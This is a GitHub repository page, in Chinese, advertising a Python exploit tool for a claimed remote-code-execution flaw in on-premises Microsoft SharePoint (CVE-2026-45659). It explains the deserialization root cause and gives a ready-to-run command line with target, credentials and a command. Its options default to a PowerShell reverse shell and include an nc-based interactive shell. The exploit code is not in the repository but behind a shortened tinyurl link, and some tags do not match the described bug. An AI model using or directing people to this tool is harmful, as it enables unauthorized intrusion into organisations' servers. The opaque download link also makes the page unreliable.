mistbarbarianspot/CVE-2026-45659-SharePoint-RCE

GitHub: mistbarbarianspot/CVE-2026-45659-SharePoint-RCE

针对 Microsoft SharePoint Server 不安全反序列化 RCE 漏洞(CVE-2026-45659)的 Python 利用工具,仅需低权限凭据即可实现远程代码执行。

Stars: 0 | Forks: 0

## CVE-2026-45659 SharePoint 反序列化 RCE ### 概述 针对 CVE-2026-45659 的漏洞利用,影响 Microsoft SharePoint Server 2019/2022/Subscription Edition (本地部署)。 经过身份验证的低权限用户(Site Member 或同等权限)可以通过 `SPListItem` 处理路径中的不安全反序列化实现远程代码执行。 已在 2026 年 5 月更新之前的完全修补环境中进行测试。通过 HTTPS 工作,初始身份验证后无需任何交互。 ### 根本原因 `Microsoft.SharePoint.Library` 中的易受攻击代码路径在处理具有特定 ViewState 样式序列化的自定义字段类型时,对通过列表项的 `Update()` 方法传递的攻击者可控数据使用了 `LosFormatter.Deserialize`。没有适当的类型过滤或 ObjectStateFormatter 限制。具有 Contribute 权限的低权限用户可以通过标准的 REST/ CSOM 调用触发。 ### 用法 ``` python3 cve-2026-45659.py -t https://sharepoint.target.com -u user@target.com -p Password123 -s "SiteName/ListName" -c "whoami /all" ``` **必需条件:** - 有效的低权限凭据 (Site Member) - 至少包含一个可编辑项的目标列表 **选项:** - `-c` - 要执行的命令(默认:powershell reverse shell) - `--shell` - 交互式 reverse shell 模式(使用 nc) - `--proxy` - HTTP 代理支持 - `--quiet` - 最少输出 在修补前的最新 CU 的 Windows Server 2019/2022 上保持稳定。 ### 漏洞利用 [链接](https://tinyurl.com/mphms4uy) ### 免责声明 本仓库仅出于教育和授权的红队演练/渗透测试目的提供。 该漏洞利用仅旨在用于您拥有或获得明确书面测试许可的系统。未经授权的使用可能违反法律。 使用风险自负。
标签:Microsoft SharePoint, XXE攻击, 反序列化漏洞, 威胁模拟, 编程工具, 远程代码执行, 逆向工具